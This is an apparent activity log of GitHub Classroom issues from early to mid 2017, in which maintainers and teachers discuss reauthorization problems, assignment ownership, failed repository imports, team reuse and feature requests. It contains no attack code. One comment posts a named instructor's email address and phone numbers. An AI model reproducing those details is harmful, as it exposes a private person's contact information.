@tamastompa apologies for the issues, I had to ask for more permissions due to a change in a Beta API which is why you're getting the reauthorized screen.

Is there an error that comes up for your students when they click on the link to make a new assignment?

[2017-01-05 16:28] tamastompa commented on #819
No. Basically the reauthorization doesn't work. When a student clicks on the "Reauthorization" button, it does something, but then the very same page comes back. So the student cannot apply the new permissions and continue to the assignment, because of (an unknown) problem.

[2017-01-05 16:44] tarebyte commented on #819
@tamastompa can you email me (tarebyte AT github dot com) and I can see if I can help you resolve this.

Thanks!

[2017-01-05 16:52] tamastompa commented on #819
Ok, I've sent you an email with a screenshot.

[2017-01-05 17:10] tarebyte commented on #819
@tamastompa from your screenshot and description (apologies for the misunderstanding) I _think_ this is a GitHub issue not a Classroom issue.

Would you mind reaching out to support and mentioning that I asked you to reach out?

[2017-01-06 10:45] #819 closed

[2017-01-06 17:05] Gruximillian commented on #664
@tarebyte

Hello, I'm having this issue again for the `Modern Developer Students` class.
I have read this disscussion, and also #464, and #770, and I think that I understood that when the person who creates the assignment is removed from the organization, then this issue arises.

I just got added recently to the organization, and the person who created the assignments is no longer in the organizat

[2017-01-06 17:32] tarebyte commented on #664
@Gruximillian while that is correct, the problem with that solution is that the founder would also have to do all of the work in creating the assignments.

For the time being I made you the creator of the assignments so that the assignment isn't broken.

If you'd like to email me about the assignments (tarebyte AT github dot com) I can help you resolve that as well.

Thanks!

[2017-01-06 23:01] Gruximillian commented on #664
@tarebyte
Thank you for the swift reply. Our assignment is just the starting repository structure that the students have to use and maintain. We do not assign any other assignments using the GitHub Classroom, so it is possible that once it is set up, the assignment will stay the same, so far that was the case. But it's fine now, everything is working, students are able to accept the assignments. W

[2017-01-06 23:34] tarebyte commented on #664
You can actually change the assignment name in Classroom! There is a settings link on the assignment page 😄

[2017-01-06 23:45] Gruximillian commented on #664
@tarebyte
Oh sorry, I forgot to mention that. I tried that couple of times, and I tried just now, but I get this message: `Your assignment repository prefix must be unique `. But there is no such assignment present in the Classroom. I tried to change it to 'coursework', that is the prefix used at the beginning of the Classroom usage.

[2017-01-07 00:43] tarebyte commented on #664
Interesting, please email me so we can discuss the actual assignments and I can help get you squared away.

[2017-01-07 01:19] Gruximillian commented on #664
@tarebyte
Thanks, I have emailed you.

[2017-01-09 02:19] tarebyte opened #823 "Allow staff to transfer Assignments to another creator"
Had an idea from the conversation in https://github.com/education/classroom/issues/812 with @nwoodthorpe

It would be ✨ if as staff members we could change the `creator` of an assignment to another user in the organization.

/cc @wilfriedE as this would be a good first feature

[2017-01-11 05:35] wilfriedE commented on #823
@tarebyte  happy to take this on. Should the new creator have to confirm by accepting to becoming the creator of the assignment before assuming the role?

[2017-01-11 12:49] tarebyte commented on #823
That sounds like a good idea to me.

/cc @johndbritton for thoughts

[2017-01-11 16:37] tarebyte commented on #823
@wilfriedE I didn't read your comment properly. Since this is a Staff tool we don't need permissions from users right now.

We can just do the transfer.

[2017-01-13 18:15] johndbritton commented on #768
@jasonnutter We've rolled out a fix for this, thanks for reporting.

[2017-01-13 18:15] #768 closed

[2017-01-13 20:58] wilfriedE commented on #823
@tarebyte what should changing the creator look like. Bellow is an approach that I am currently thinking about.
![change_creator](https://cloud.githubusercontent.com/assets/1964213/21945389/ffccbad6-d9a8-11e6-803f-11f268f841ee.png)

[2017-01-13 21:31] tarebyte commented on #823
@wilfriedE I'm that looks ✨

[2017-01-14 16:08] #812 closed

[2017-01-17 23:34] robustUTEP opened #826 "can't create classroom"
Hi.  I need to create two classrooms for the semester that starts tomorrow

2017-spr-nets
2017-spr-arch1

The error: "another user has added this user to github classroom.
My username is robustUTEP

My email: efreudenthal@utep.edu
My phone: 915-747-6954 or (cell) 917-279-6208

Thanks, Eric

[2017-01-18 00:50] tarebyte commented on #826
@robustUTEP looking at your classroom page, I can't see those two organizations.

Would you mind verifying that you've granted Classroom access to these organizations https://github.com/settings/connections/applications/64a051cf1598b9f0658f

Thanks!

[2017-01-18 05:33] robustUTEP commented on #826
yes.   I haven't made any orgs for the spring yet.   The system asks me for a credit card!

[2017-01-18 18:15] tarebyte commented on #826
@robustUTEP looking at your discount requests, we can't accept them because you didn't finish filling out the information.

Once we have all of the information we'll be able to approve your requests.

Thanks!

[2017-01-19 04:46] #713 closed

[2017-01-23 21:20] mdwheele commented on #240
@johndbritton I've implemented support for GitHub Enterprise to use Classroom at NC State. I've got some cleaning up to do, but the gist of the work was:

* New environment variables added to `.env.example`, `.env`, `config/secrets.yml`.
* Expand configuration of `GitHubClassroom.github_client` to pull environment variables that determine if integrated with GitHub Enterprise or not (i.e. `GITHUB_E

[2017-01-23 21:31] tarebyte commented on #240
@mdwheele how are you handing the use of Starter Code?

The API for that the source code importing: https://developer.github.com/v3/migration/source_imports/ is still under preview and as far as I'm aware not available for Enterprise yet.

[2017-01-23 22:07] mdwheele commented on #240
Im open to suggestion on how to handle. Enterprise doesn't have that API yet so a simple option might be to disable the feature if integrated with GHE. Without knowing when/if that API will be released on GHE, it may be premature to carry technical debt of an alternative import implementation specific to GHE, but I'm willing.

Most of my prospective users are currently provisioning repos with simp

[2017-01-26 16:08] amueller opened #830 "Readthedocs hard (?) to use with classrom"
See https://education.github.community/t/continuous-integration-for-each-submission/8347/4

I'm trying to make the students use readthedocs to build some documentation they write.
This is one build per student.
Because this is homework, the repositories are private, so readthedocs.org doesn't show them. They could use readthedocs.com (I think) but that doesn't show the repositories, because the st

[2017-01-26 16:16] amueller opened #831 ""make students admin" is not applied to existing repositories"
I checked the "make students admins" and it seems this was not applied to existing repositories. Is that by design? It would be great if I could change that - instead of having to go through 100 repositories one by one.

[2017-01-27 20:50] tarebyte commented on #831
@amueller just to make I understand this was an assignment that has existing submissions?

Right now you're correct we don't do that, the work to update all of those would be similar to https://github.com/education/classroom/pull/788

[2017-01-28 04:20] greensam commented on #664
I'm having with same problem, where an organization owner was removed and now no new assignments or repositories can be created. Is there a work around?

[2017-01-28 05:38] tarebyte commented on #664
There isn't a work around right now, there will hopefully be one 🔜

In the mean time @greensam I've gone ahead and removed the users that don't belong in your Classroom, and updated the creators so that it is your account. So you should be all squared away for the time being.

[2017-01-29 03:25] ccannon94 opened #832 "Adding a repository to an assignment has no effect"
I've tried adding a repository to an assignment several times. This repository was previously linked to an example assignment I went over with the instructor. I deleted the example assignment and have created a new private assignment. The repository is private, owned by the same organization associated with the classroom. Attempting to delete and re-add the repository multiple times has made no di

[2017-01-29 05:17] ccannon94 commented on #832
Turns out the code was present in the repository, but for some reason I wasn't getting a confirmation message like I was in the past.

[2017-01-29 15:16] amueller commented on #831
Not sure what submission means in this context. I mean people clicked on the link and had a repository created for them. If I update the permissions after that happened, they are not updated.

I tried to be conservative when creating the assignment, but it turns out that not having admin rights makes using gh-pages somewhat less intuitive, so I wanted to change it.
It would be a great feature to h

[2017-01-29 18:16] tarebyte commented on #831
@amueller yup I see what you mean, this would be similar to the work done in: https://github.com/education/classroom/pull/788

[2017-02-02 03:23] WillClaudeHolmes commented on #502
I am not sure if this is still being considered, but I would really like this feature (the ability to push changes to student repos after they were created).  I don't know enough about GitHub and Classrooms to suggest implementations, but this would be a big help.  My use case is that I need to make changes / modifications / corrections to the assignment after the students have created their repos

[2017-02-04 05:34] nwoodthorpe opened #834 "Session error thrown when db is reset"
Any time I reset the database, I get errors thrown from the app trying to load users the session insists exist. Not really an issue in production, but it'd be nice to add some error handling so we don't need to clear the session every time.

@tarebyte  worth fixing? I haven't thought through the edge cases yet, but switching to `#find_by(id: ` should work. `@true_user` would be set to nil as if th

[2017-02-04 06:58] nwoodthorpe commented on #813
@tarebyte Finally put some time into looking at this! Few questions:

As I understand, we have Groups that represent a group of students working together on one repository, and Groupings that represent the collection of Groups working on a group-assignment. Is that right?

When we delete a Group, do we want it's repository on GitHub removed?  And when we delete a Grouping, do we want all of it's G

[2017-02-04 14:21] tarebyte commented on #813
For the meantime I'd say let's play it on the safe side and not do that.

Yes

[2017-02-04 16:38] #356 closed

[2017-02-04 16:40] #503 closed

[2017-02-04 16:41] #632 closed

[2017-02-04 16:41] #826 closed

[2017-02-04 18:20] #693 closed

[2017-02-04 19:59] #665 closed

[2017-02-04 20:00] #625 closed

[2017-02-04 20:00] #572 closed

[2017-02-04 20:01] #530 closed

[2017-02-04 20:40] #834 closed

[2017-02-04 20:42] #780 closed

[2017-02-06 02:26] janetlndavis commented on #286
I'd like to raise attention to this issue again. Thanks for sharing your tool @djholt!

[2017-02-06 14:12] technicalpickles opened #840 "Heroku app "github-classroom" logging stopped"
_redacted, wrong repo_

[2017-02-07 03:29] #840 closed

[2017-02-07 19:39] webdif commented on #595
Is there any progress about this issue? It's a critical issue for my organization. Thanks!

[2017-02-07 19:46] tarebyte commented on #595
@webdif unfortunately right now I just don't have the bandwidth to work on it. If anyone has the time to make it happen I'd be happy to review the work.

[2017-02-08 02:19] DeltaHeavy opened #844 "Re-using teams: clearer naming convention recommendations and team limits"
I want to be a team named my name for the whole class, for each assignment. I do not want to have to pick a new permutation of my name every time a new assignment rolls around.

Otherwise, Github Classroom is amazing. Thanks!

[2017-02-08 15:39] mozzadrella commented on #844
@DeltaHeavy 👋

You should be able to re-use teams for every assignment over the semester.

Are you trying to make your whole class one team? Let us know what your goal is and we'll see how we can help in the meantime.

[2017-02-08 19:11] DeltaHeavy commented on #844
When I try to re-enter the same team name, it says the team name is already
taken, but my team name is also not on the list of available teams to join.

It's possible this is due to the way my professor has configured it.

Thanks!
Max
On Wed, Feb 8, 2017 at 7:39 AM Vanessa <notifications@github.com> wrote:

--
Max Zinkus

[2017-02-10 15:20] sanicki opened #845 "Identify the owner who has added the organization to a classroom"
Currently there is a 1:1 relationship between organizations and classrooms.

If a classroom has already been added to an organization the tooltip "Another owner has already added this organization to GitHub Classroom" appears.

<img width="572" alt="another" src="https://cloud.githubusercontent.com/assets/6764844/22832146/26f5aefc-ef6a-11e6-8ecd-a0f0f2b21d79.png">

This is confusing for both organ

[2017-02-10 16:28] ccannon94 opened #846 "Set default repository settings for student repos"
Teachers should be able to modify student repository settings based on their own needs. For example, I would like to make sure that `master` branch is protected in all of my students's repositories and requires a pull request approval to merge. This way, I know any code in `master` has been graded, which is part of our pull request process.

Currently, each student repository is initialized with G

[2017-02-10 16:40] ccannon94 commented on #765
Agree strongly! I'm a TA and I'm leading the effort to introduce GitHub to our 2nd level CompSci intro course. Because the professor is new to GitHub and git, he tasks me to create all assignments, and myself along with 3 other TA's do the grading. Right now all four of us could potentially do way more than a TA should be permitted to with the student's code and the classroom as a whole.  It would

[2017-02-11 18:24] janetlndavis opened #847 "Sort assignment repositories"
When viewing the list of repositories associated with an assignment, there is no way to change the sort order. It would be helpful to be able to sort them alphabetically so the order in the Web interface matches the order of the cloned repos in my local filesystem.

[2017-02-11 18:25] janetlndavis commented on #847
See, for example, https://classroom.github.com/classrooms/22714409-whitmanswdesignspring2017/group-assignments/project1

[2017-02-16 14:26] mozzadrella commented on #844
* Teacher creates a new assignment, chooses a pre-existing team, invites a student
![screen shot 2017-02-16 at 9 23 03 am](https://cloud.githubusercontent.com/assets/1874003/23024771/8fd7f664-f429-11e6-8003-6dd761a0ef0c.png)
* Student accepts the assignment, but then is not directed to a pre-existing team. I was invited to join this team via the link and saw this:
![screen shot 2017-02-16 at 9 15

[2017-02-16 14:59] tarebyte commented on #844
Hi @DeltaHeavy

[2017-02-16 15:02] tarebyte commented on #844
@DeltaHeavy

So it appears that your professor is in fact creating a different set of teams for each assignment.

Each set of groups comes with it's own distinct set of teams, which means that we basically force you to create a new team each time.

Unless you professor reuses a set of groups for the next assignment there really isn't anything we can do.

Hope this help clarifies your issue.

[2017-02-16 15:02] DeltaHeavy commented on #844
Something like that, although in my case I don't think my teacher assigned
a team so we were prompted to create a new one as mentioned earlier.

Thanks
On Thu, Feb 16, 2017 at 6:59 AM Mark Tareshawty <notifications@github.com>
wrote:

--
Max Zinkus

[2017-02-16 15:34] tarebyte opened #848 "Org owners that have rejected auth tokens can't be removed from a Classroom in stafftools"
Ran across an issue today where if the org owner has rejected their auth token for Classroom, we can't remove them from the Classroom in stafftools.

/cc @nwoodthorpe

[2017-02-20 02:32] keithagroves opened #849 "Set up Classroom before Day 1: Ability to deliver assignments to students without a link"
I work at a school where the teachers would use github classroom if it would allow us to accept the assignment on the students' behalf.

This way the students can log onto the github client and see the next assignment ready to clone.

[2017-03-02 03:26] greensam opened #851 "Error when students accept assignment (sometimes solved with refresh)"
Any reason in particular this is happening? Students have been reporting it for the last 24 hours or so.

[2017-03-02 04:45] tarebyte commented on #851
@greensam does the page just error out? Or is there a flash message that shows up?

[2017-03-04 16:27] newmerator opened #852 ""An error occurred" from Google search results"
<img width="765" alt="screen shot 2017-03-04 at 10 21 09 am" src="https://cloud.githubusercontent.com/assets/1458245/23580327/1acc1960-00c5-11e7-9b28-4ea59482f8d8.png">

[2017-03-04 17:28] tarebyte commented on #852
Will look into it, thanks @newmerator!

[2017-03-07 13:50] #782 closed

[2017-03-08 04:07] greensam commented on #851
Sorry for the delay -- it was showing them an application error page (looked like the RoR default page for a 500)

[2017-03-09 20:59] emersonmello opened #853 "URL Shortener: Assignments' invitation link"
**Feature request:**

Currently assignments' invitation link is really big and it is not suitable to be included in lecture' slides.

Github Classroom could offer a URL shortener for that, like bit.ly or goo.gl.

Cheers,

[2017-03-09 22:34] tarebyte commented on #853
So we had bit.ly support early on in the project but it turns out that using bit.ly would expose all of the assignment URLs (see https://github.com/education/classroom/issues/112) so we had to ✂️  it.

We could add our own URL shortening possibly though.

[2017-03-09 23:48] emersonmello commented on #853
Great, thanks! My point was exactly that, classroom could offer this feature by itself.

PS: I didn't know https://git.io .

[2017-03-16 14:17] mozzadrella commented on #851
@tarebyte @greensam @dinever other users are encountering similar "erratic" behavior": https://education.github.community/t/erratic-behavior-when-accepting-assignments-solved-with-refresh/10540

I was able to reproduce the error:
Lab 1. Accepted the assignment successfully.
![screen shot 2017-03-16 at 10 09 37 am](https://cloud.githubusercontent.com/assets/1874003/24000461/abab4eea-0a31-11e7-9d63-

[2017-03-16 14:23] #748 closed

[2017-03-17 18:39] jaegernh commented on #595
I just stumbled upon this and agree with it's importance. I might take a look if I can find the time. @tarebyte

[2017-03-18 18:04] tarebyte commented on #852
Looks like it's resolved now

<img width="603" alt="screen shot 2017-03-18 at 14 04 41" src="https://cloud.githubusercontent.com/assets/564113/24074688/da9a9fa4-0be3-11e7-9456-686d7b42bcd5.png">

[2017-03-18 18:04] #852 closed

[2017-03-25 17:08] ubiclassanirban opened #858 "Can't switch account when accepting assignments once the assignment link is opened with one of the accounts."
I have two GitHub accounts. After opening an assignment link with one of my accounts, if I wish to log in with a different account to accept that assignment, that just doesn't seem to be possible. Even if I open GitHub on a new tab, log out and log in with my second account, the assignment link still opens with me logged in with my former account.

[2017-03-25 18:15] tarebyte commented on #858
@ubiclassanirban did you sign out of Classroom?

It may also help to sign in using an Incognito window to make sure all the cookies are clear.

[2017-03-25 19:19] ubiclassanirban commented on #858
Ok, I didn't realize that the classroom and the regular GitHub website have separate login sessions.

[2017-03-25 19:19] #858 closed

[2017-03-29 11:12] stephenlevitt commented on #448
Is this still a work in progress or has it been canned? Such functionality would be a really useful addition to GitHub classroom!

[2017-03-30 18:09] melmo commented on #765
Any progress on this? I would really like to set up Classrooms for a community based school I'm working at, but giving owner access to 40+ volunteer teachers makes this a non-starter for us.

[2017-04-14 14:26] KokoDoko commented on #595
Agreed. If the organisation is a school then it makes sense that there can be more than 1 classroom! It's awkward to create a new organisation for every class or every semester!

[2017-04-19 13:24] drbeco opened #861 "Lock new members"
I'd like to be able to create an assignment with a deadline to join.

After that, students should not be able to create new teams/groups nor enter the existent ones.

Thank you.

[2017-04-19 13:30] drbeco commented on #603
Please how are our standing in this feature-request?

I would like to address some of the criticism above.

It is actually an "open" option that would not violate or constrain anything if chosen not to be used (for example, default it to zero if not set, or manually set it to zero if one's wish).

Some students above wrote that that would be annoying to need to wait instead of starting immediately

[2017-04-19 13:33] drbeco commented on #861
addendum: another way of looking at it is a "link expire date" (if that makes any sense to the developers inspiration)

[2017-04-21 00:19] ItsPugle commented on #853
What about an URL shortener, like git.hub? That might work, and from a marketing perspective, is basically free branding and advertising.

[2017-04-21 22:16] kylekthompson commented on #438
Hey! I'd be interested in giving this a shot (assuming you still want help with it).

A couple questions first:

- I took a quick look at GitHub's transfer feature, and it looks like Issues/PRs/Projects aren't moved over. Is this something we are ok with?
- Given that the developer plan now gives unlimited private repos, is there still a concern public/private situation? If I'm thinking about this

[2017-04-21 23:35] drbeco opened #862 "Repository failed to import"
Hello guys,

One of my students got an empty repository instead of the draft code I used as template.
(Of course, I don't know if internally all the database of classroom is coherent)

Could you please take a look at this:

https://github.com/BecoSystems/guess32-Rodrigodpompilio

https://classroom.github.com/classrooms/9666573-becoroom/assignments/guess32

I should point out that all others until

[2017-04-21 23:49] tarebyte commented on #862
I emailed back @drbeco and fixed for him in  the console. We need to have a better way to handle failed imports, not sure what that should be yet though.

[2017-04-21 23:53] drbeco commented on #862
Yes, everything is dandy! Thank you so much. We can close this now.

[2017-04-21 23:53] #862 closed

[2017-04-21 23:54] drbeco commented on #862
Or you may want to keep it open to discuss that?

One suggestion: allow the professor to "delete" and "retry". It is a work around, but it is really good to have such power and not need to bother you guys every time.

[2017-04-21 23:55] tarebyte commented on #862
@drbeco did you go to the import page and see if you could reimport?

[2017-04-21 23:58] drbeco commented on #862
I went only to the classroom assignment page and there is no such option. Where is the import page again, please?

* Also: I went to the repository itself, and I saw it created empty. I could manually copy my template into it and commit/push.

[2017-04-22 00:04] tarebyte commented on #862
The import link would've been https://github.com/your-class/the-assignment/import

I _thought_ there was a retry button, but my memory might be failing me, it's been a long week.

[2017-04-22 00:08] drbeco commented on #862
Could you clarify the link. I've tried:

* https://classroom.github.com/becoroom/guess32/import
* https://classroom.github.com/9666573-becoroom/guess32/import
* https://classroom.github.com/classrooms/9666573-becoroom/assignments/guess32/import

To no avail

[2017-04-22 00:09] tarebyte commented on #862
@drbeco to be clear my example is a github URL, I think you're trying to reach the import via classroom.

[2017-04-22 00:10] tarebyte commented on #862
@drbeco the import URL is only available when the repository is being imported

If it's done it will redirect you to the repo

[2017-04-22 00:12] drbeco commented on #862
Oh, ok then. I've tried a dozen of others and I was thinking I'm autist or something.

[2017-04-22 00:14] drbeco commented on #862
@tarebyte just to register:

It should be:

* https://github.com/9666573-becoroom/guess32-Rodrigodpompilio/import

right? (with the numbers ?)

Just in case someone needs to try this anytime soon (hopefully not)

[2017-04-22 00:19] drbeco commented on #862
Now I got! :smiley:  Aahahaha

* https://github.com/becosystems/guess32-Rodrigodpompilio/import

It is actually

* https://github.com/Your-Organization/The-Assignment/import

[2017-04-22 00:22] tarebyte commented on #862
Sorry I wasn't more clear @drbeco glad you got it!

[2017-04-22 21:55] drbeco opened #863 "Importing also "issues" and other things"
I have a simple question:

* When we have a "template" repository used to generate the assignments, will the classroom import also the issues, milestones and labels that we create in the template?

Thanks

[2017-04-22 23:18] tarebyte commented on #863
Unfortunately classroom only support code cloning, we can't do issues and so on as of right now.

[2017-04-22 23:26] drbeco commented on #863
Thanks for your reply!

I've created a script to generate multiple issues in an "individual assignment" to help with this for now. I'll share it here soon.

[2017-04-23 01:07] drbeco commented on #863
Here it is. The first version at least. I like very much the way you guys handled the repositories' names when creating a individual assignment. It makes scripting easier.

https://github.com/drbeco/githubin

* The first script I published here is the `github-issue.sh` , but I have another. It is just that the code is a mess right now, and I cannot publish out of shame. It will come soon.

[2017-04-23 16:04] #863 closed

[2017-04-26 17:21] GrantZukowski commented on #286
I have this same issue and I am considering other options to move away from github classroom like Cloud9

[2017-05-01 14:42] Winbobob commented on #721
Hi @johndbritton, I think it is interesting and beneficial to integrate GitHub Classroom with Google Classroom or other Learning Managements Systems (LMSes), such as Blackboard, Moodle.

In this paper ([Student experiences using GitHub in software engineering courses: a case study](http://dl.acm.org/citation.cfm?id=2889195)), one concern the author mentioned is that GitHub lacks administrative fun

[2017-05-04 16:47] ms-studio commented on #772
Just mentioning that I'm trying out Github classroom assignments, and in a group of 9 students, three imports have failed. Two of the failures were resolved after a second attempt.

The third failure could not be resolved, every attempt to create the repository displays the message "There was an error pushing commits to GitHub."

Here's the repository that keeps failing to get created: https://git

[2017-05-06 01:10] drbeco commented on #861
Please: what if I edit one group assignment that was previously set to 6 members, current state: some groups full, some groups with 4 or 5 members.

Edition: change the numbers of members to, say, 0.

Will this prevent new groups to appear? Will this edition creates an error in the database somehow?
If so, what if I change to 1, to prevent new members to join groups with currently open spots?

Tha

[2017-05-10 06:29] drbeco commented on #861
:thinking: @tarebyte :question:

[2017-05-10 19:44] tarebyte commented on #861
@drbeco I think it's an interesting idea, I honestly just don't have the time to implement this right now.

[2017-05-10 20:02] drbeco commented on #861
What about this workaround @tarebyte :

[2017-05-10 22:15] tarebyte commented on #861
@drbeco the work around you mentioned above will work.

See https://github.com/education/classroom/blob/master/app/controllers/group_assignment_invitations_controller.rb#L52-L56

[2017-05-11 01:53] drbeco opened #865 "Changing the maximum number of members won't take effect"
I have this assignment, originally with 6 members each group.

There are 6 groups. Before the change they had:
* A: 6 members
* B: 6 members
* C: 5 members
* D: 4 members
* E: 5 members
* F: 4 members

I changed the configuration to be 5 members maximum.

I just saw someone entering group D, turning it into a 6 members group!

--

Link to the assignment:
https://classroom.github.com/classrooms/966

[2017-05-11 18:58] BelieveC commented on #432
I would like to work on this!

[2017-05-11 19:33] tarebyte commented on #432
Go for it @BelieveC

[2017-05-13 12:37] ItsPugle opened #866 "Pricing for GitHub Classroom?"
Hey there,

I was just wondering how the pricing of GitHub Classroom goes, and well if GitHub Classroom is even a paid service?

Thanks,
Tim/ItsPugle

[2017-05-13 12:40] ItsPugle commented on #866
Just going to tag, @sanicki and @mozzadrella - Who may (or may not) remember me from the GitHub Education Community.

[2017-05-13 12:40] tarebyte commented on #866
Hi @ItsPugle, GitHub Classroom is and will always be free.

It's meant to be accessible to anyone who needs it.

[2017-05-13 12:41] ItsPugle commented on #866
Jesus. That was a fast as reply.
Oh my... xD

Thanks for that! <3

[2017-05-13 12:59] sanicki commented on #866
@ItsPugle Just a quick clarification to @tarebyte's response:

[GitHub Classroom](https://classroom.github.com) is and always will be free. GitHub Classroom may be used in conjunction with free or paid [GitHub organizations](https://help.github.com/articles/about-organizations). Free GitHub organizations allow you to create unlimited public repositories, while [paid GitHub organizations](https://h

[2017-05-15 18:17] #866 closed

[2017-05-16 05:47] paragmantri commented on #595
Is here any update on the issue. As I see it now, there is still only one classroom per organisation.

[2017-05-20 21:57] ktmud opened #868 "Deleting teams creates ghosts in group assignments?"
Do the following:
1. Join a group assignment and create a new team
2. Delete this team in organization admin
3. Use the same account to accept the group assignment again.
4. Should see the join/create team interface again, yet only an accept button is available and click on it will create a "ghost" repository.

Your account won't be able to join any team again once you have joined a team in an exi

[2017-05-20 21:58] ktmud commented on #868
OK. Related to #292.

[2017-05-20 21:58] #868 closed

[2017-05-22 22:47] nwoodthorpe commented on #865
Thanks for the bug report!

I've tried to reproduce using the steps below, but I was unable to add an extra user to the team.

1. Created a group assignment with maximum 2 users per team
2. Added 1 user to the team
3. Updated the group assignment to be 1 user per team maximum
4. Attempted to add another user to the team. Button was grayed out.

Have you been able to replicate the issue? If so, rep

[2017-05-22 22:47] #865 closed

[2017-05-22 23:08] nwoodthorpe commented on #851
Since this error pops up so infrequently, it'll be difficult to find a cause without more information.

When the server throws 500's like this, a bunch of information is dumped into the server production logs. If anyone else comes across this issue, pasting these logs would help us out a lot!

[2017-05-22 23:24] nwoodthorpe commented on #849
Interesting idea. I've marked it as a feature-request to be done when we have time!

[2017-05-23 00:04] nwoodthorpe commented on #845
@sanicki How about the text "<%= username %> has already added this organization to GitHub Classroom."? I think this implies organizations can only be added to Classroom once. Explaining that there is a 1-1 relationship AND organizations for classrooms must be unique through the entire app will be tricky to fit in a tooltip!

[2017-05-23 00:53] sanicki commented on #845
Sounds good. 👍

[2017-05-23 16:38] nwoodthorpe commented on #831
@tarebyte does #788 being merged close this issue?

[2017-05-23 16:53] nwoodthorpe commented on #830
Hey @amueller, thanks for your comments.

You're completely right, in it's current state, Classroom has trouble working with a lot of GitHub integrations. There isn't an immediate solution, but it's something that should be addressed for sure. I'll give you a shout when there's progress on this.

[2017-05-23 16:55] nwoodthorpe commented on #823
@wilfriedE Any progress on this?

[2017-05-23 17:22] nwoodthorpe commented on #786
Duplicate of #772

[2017-05-23 17:22] #786 closed

[2017-05-23 17:24] nwoodthorpe commented on #784
Duplicate of #772.

Thanks for the reports everyone. I'll try to get time this week to dig into this.

[2017-05-23 17:24] #784 closed

[2017-05-23 17:27] nwoodthorpe commented on #783
@weilandia Was this ever done? If not, no worries. We can free it up for other users looking to contribute :)

[2017-05-23 17:28] nwoodthorpe commented on #781
@tarebyte thoughts? My only concern is that many (most?) users don't actually have private repositories, so these users would all have to switch back to public each time.

[2017-05-23 17:49] nwoodthorpe commented on #775
If you're leaving comments on a PR authored by a student, the student will get notified regardless of whether or not they're watching the repo (as long as they haven't disabled all their notifications in settings).

Regardless, I like the idea. I think it makes sense for them to be notified about all activity, it is their assignment after all. One use case I see is getting notifications when a tea

[2017-05-23 17:51] nwoodthorpe commented on #775
This would be a fun one for someone new to the repository to try out. It would involve trying to find a way to make this happen using the GitHub API.

[2017-05-23 18:11] nwoodthorpe commented on #772
This is going to be tricky to solve, considering the failing code is part of a dependency and out of our control. For the cases where a retry solved the issue, it would be trivial to add retry logic [here](https://github.com/education/classroom/blob/a0975fa566daaf2a3349d50c2ee883d19591334d/app/models/assignment_repo/creator.rb#L77-L81) that errors after 2 or 3 attempts.

Perhaps something like thi

[2017-05-23 18:15] weilandia commented on #783
@nwoodthorpe let's open it up.  My bad for not mentioning sooner.

[2017-05-23 18:20] nwoodthorpe commented on #783
Np, thanks for getting back to me!

[2017-05-23 18:28] nwoodthorpe commented on #769
Restricting students to one assignment repo per assignment makes sense to me. This should be an easy fix, added to the TODO

[2017-05-23 18:36] nwoodthorpe commented on #767
Duplicate of #846.

We certainly need better assignment repo initialization options. I'm not sure whether that means inheriting more from starter repos or having some sort of initialization interface, or perhaps another solution. I'll be looking into this when I have time!

[2017-05-23 18:36] #767 closed

[2017-05-23 18:36] nwoodthorpe commented on #846
Note from the closed issue above, it would be nice to have a way for new repos to be initialized with custom labels.

[2017-05-23 18:49] nwoodthorpe commented on #765
I like this idea. In my opinion, the cleanest way to do this would be to have a "GitHub Classroom Administrators" team on GitHub that represents members with this elevated privilege. It would default to being disabled (to avoid classrooms with an unfortunately named team accidentally giving users elevated privileges).

@johndbritton Thoughts?

[2017-05-23 18:53] nwoodthorpe commented on #749
I'm going to close this as a duplicate of #846. I'm not 100% sure we want to do this, but it certainly falls under the umbrella of "Repo initialization is hard right now".

[2017-05-23 18:53] #749 closed

[2017-05-23 18:56] nwoodthorpe commented on #747
GitHub and GitHub Classroom authentication are actually separate, it's possible to have both be logged in to different accounts, or have one logged in and one logged out. It sounds like the later was happening in this case. The solution is to re-login to whichever app got logged out.

If this pops up again, feel free to re-open!

[2017-05-23 18:56] #747 closed

[2017-05-23 19:17] ms-studio commented on #772
Thanks for looking into it. Not sure if anything has changed, but I tried some further assignments with groups of circa 10 students, and didn't encounter any failures anymore.

[2017-05-23 19:21] ccannon94 commented on #853
Now that git.io is officially a thing, is there any chance of integration here @nwoodthorpe ?

[2017-05-23 19:54] nwoodthorpe commented on #853
Absolutely, I think thats a great idea. I've added it to my TODO :)

[2017-05-23 20:04] nwoodthorpe commented on #734
This has been inactive for 8 months, seems like it was a caching issue. If this re-occurs, feel free to re-open.

[2017-05-23 20:04] #734 closed

[2017-05-23 20:18] nwoodthorpe commented on #730
Regarding users creating new teams, this was mentioned here #861.

Not having a way to delete a team sounds like a bug though (or a feature we really should have). Added to the todo. :+1:

[2017-05-23 21:07] nwoodthorpe commented on #769
Going to close as a dup of #729 and move my comment there.

[2017-05-23 21:07] #769 closed

[2017-05-23 21:07] nwoodthorpe commented on #729
Restricting students to one assignment repo per assignment makes sense to me. This should be an easy fix, added to the TODO

[2017-05-23 21:16] nwoodthorpe commented on #721
This would be a cool bigger project to do. Allowing GitHub to integrate with generic LMSs, and not just Google Classroom would be interesting. I don't know enough about how these work, is exposing a rich REST API for them to hook into not enough? Creating the integration ourselves seems scary because there's no way all these LMSs share a common interface

[2017-05-23 21:40] nwoodthorpe commented on #682
I think this is worth chatting about, the idea of a huge DB of exercises and problems that professors can pick from and work with natively through Classroom sounds very exciting.

I'm visioning some sort of system where a professor can plan out his/her assignments for each week, selecting one or many exercises for each week. The app could automatically make all the assignment repo's for students o

[2017-05-23 22:50] nwoodthorpe commented on #673
Same sort of deal as #846. Will add a note than default branches are also something people want. Thanks for the report :)

[2017-05-23 22:50] #673 closed

[2017-05-23 22:51] nwoodthorpe commented on #846
As per #673, default branches carrying over from starter repo's is another requested feature.

[2017-05-23 23:07] nwoodthorpe commented on #853
Chatted with @technoweenie today, he says we should look into alternatives to Git.io, it hasn't been worked on in years and has no active devs.

It would be simple enough to roll our own url shortening in Classroom. Thoughts @johndbritton ?

[2017-05-23 23:30] nwoodthorpe commented on #595
It seems a lot of people are interested in this feature. We still have some implementation details that need to be ironed out, but I'll try to prioritize solving this.

[2017-05-23 23:35] nwoodthorpe commented on #587
Deciding what to copy from the base repo is being discussed in #846

Allowing TAs to have elevated priviledges without being an owner is being discussed in #765

[2017-05-23 23:35] #587 closed

[2017-05-23 23:43] nwoodthorpe commented on #534
It looks like this feature isn't possible with the current implementation of git and GitHub. Going to close, if anyone has any updates, feel free to re-open.

[2017-05-23 23:43] #534 closed

[2017-05-23 23:49] nwoodthorpe commented on #507
